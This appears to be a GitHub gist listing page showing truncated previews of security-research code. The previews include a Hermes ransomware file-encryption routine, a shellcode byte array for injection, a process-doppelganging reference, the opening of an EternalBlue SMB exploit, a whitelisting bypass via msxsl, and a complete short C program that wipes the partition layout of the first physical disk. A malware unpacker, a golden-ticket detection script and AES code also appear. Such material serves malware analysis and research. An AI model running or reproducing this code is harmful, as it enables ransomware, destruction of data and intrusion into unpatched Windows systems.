Voraka
hasherezade
/ unpack.cpp
Last active
June 27, 2018 08:36
LibPeConv-based unpacker for sample: bd47776c0d1dae57c0c3e5e2832f13870a38d5fd
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| #include "peconv.h" | |
| // for the sample: bd47776c0d1dae57c0c3e5e2832f13870a38d5fd | |
| // from: "Unpacking Pykspa Malware With Python and IDA Pro - Subscriber Request Part 1" | |
| // https://www.youtube.com/watch?v=HfSQlC76_s4 | |
| int (__cdecl *unpack_func)(BYTE* blob, DWORD blob_size, LPCSTR lpFileName, char r_val) = nullptr; |
Voraka
/ Hermes.cpp
Created
December 19, 2017 03:22
Ransom.Win32.Hermes (94e7bf38f338189b4f3a1bac892ac0fb0e911858)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <wincrypt.h> | |
| #include <stdio.h> | |
| #define _WIN32_WINNT 0x0400 | |
| #pragma comment(lib, "crypt32.lib") | |
| BOOL encrypt_file(HCRYPTPROV hCryptProv, LPCWSTR public_key_file, LPCWSTR target_file) | |
| { | |
| BOOL b_encrypted = FALSE; | |
| HANDLE hKey = CreateFileW(public_key_file, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <TlHelp32.h> | |
| //Shellcode to call MessageBox | |
| UINT8 sc[500] = {0x60,0x55,0x83,0xEC,0x64,0x8B,0xEC,0x33,0xC9,0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x70,0x1C,0x8B,0x46,0x08,0x8B,0x7E,0x20,0x8B,0x36,0x66,0x39,0x4F,0x18,0x75,0xF2,0x89,0x45,0x28,0x8B,0xD0,0x8B,0x42,0x3C,0x8B,0x44,0x10,0x78,0x03,0xC2,0x8B,0x70,0x20,0x03,0xF2,0x68,0x73,0x73,0x00,0x00,0x68,0x64,0x64,0x72,0x65,0x68,0x72,0x6F,0x63,0x41,0x68,0x47,0x65,0x74,0x50,0x54,0x33,0xC9,0x8B,0x3E,0x03,0xFA,0x56,0x8B,0x74,0x24,0x04,0x51,0xB9,0x0F,0x00,0x00,0x00,0xF3,0xA6,0x74,0x0B,0x59,0x5E,0x83,0xC6,0x04,0x41,0x3B,0x48,0x18,0x72,0xE2,0x59,0x8B,0x70,0x24,0x03,0xF2,0x0F,0xB7,0x0C,0x4E,0x8B,0x70,0x1C,0x03,0xF2,0x8B,0x34,0x8E,0x03,0xF2,0x8B,0xFA,0x89,0x75,0x2D,0x6A,0x00,0x68,0x61,0x72,0x79,0x41,0x68,0x4C,0x69,0x62,0x72,0x68,0x4C,0x6F,0x61,0x64,0x54,0x52,0xFF,0x55,0x2D,0x89,0x45,0x3C,0xE8,0x07,0x00,0x00,0x00,0x75,0x73,0x65,0x72,0x33,0x32,0x00,0x5B,0x53,0xFF,0x55,0x3C,0x89,0x45,0x41,0xE8,0x0C,0x00,0x00,0x00,0x |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Ref = src | |
| // https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
| // | |
| // Credits: | |
| // Vyacheslav Rusakov @swwwolf | |
| // Tom Bonner @thomas_bonner | |
| // | |
| #include <Windows.h> |
Voraka
/ format_disk.c
Last active
May 17, 2018 09:15
史上最小无需重定位的"格盘"ShellCode (https://bbs.pediy.com/thread-194664.htm)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #define IOCTL_DISK_DELETE_DRIVE_LAYOUT 0x7C100 | |
| int main() | |
| { | |
| DWROD dwReturn; | |
| HANDLE hDevice = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); | |
| int result = DeviceIoControl(hDevice, IOCTL_DISK_DELETE_DRIVE_LAYOUT, NULL,0, NULL,0, &dwReturn, NULL); | |
| return result | |
| } |
jaredcatkinson
/ Get-KerberosTicketGrantingTicket.ps1
Last active
February 24, 2024 15:19
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include "stdio.h" | |
| int read_MBR(char * lpBuffer) | |
| { | |
| DWORD readBytes = 0; | |
| HANDLE hMBR; | |
| hMBR = CreateFileA("\\\\.\\\\physicaldrive0", GENERIC_READ, 3, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); | |
| if (hMBR ==(HANDLE)-1) | |
| return 0; |
Voraka
/ eternalblue_exploit.py
Last active
August 24, 2017 05:35
EternalBlue exploit for Windows 7/2008 by sleepya
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
netbiosX
/ customers.xml
Created
July 5, 2017 20:29
Bypass Application Whitelisting via msxsl binary
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <?xml-stylesheet type="text/xsl" href="script.xsl" ?> | |
| <customers> | |
| <customer> | |
| <name>Microsoft</name> | |
| </customer> | |
| </customers> |
Voraka
/ aes_crypt.cpp
Created
July 5, 2017 02:15
— forked from hasherezade/aes_crypt.cpp
AES 128 - encrypt/decrypt using Windows Crypto API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <wincrypt.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "crypt32.lib") | |
| #define BLOCK_LEN 128 | |
| //params: <input file> <output file> <key> <is decrypt mode> | |
| int wmain( int argc, wchar_t *argv[]) | |
| { |
NewerOlder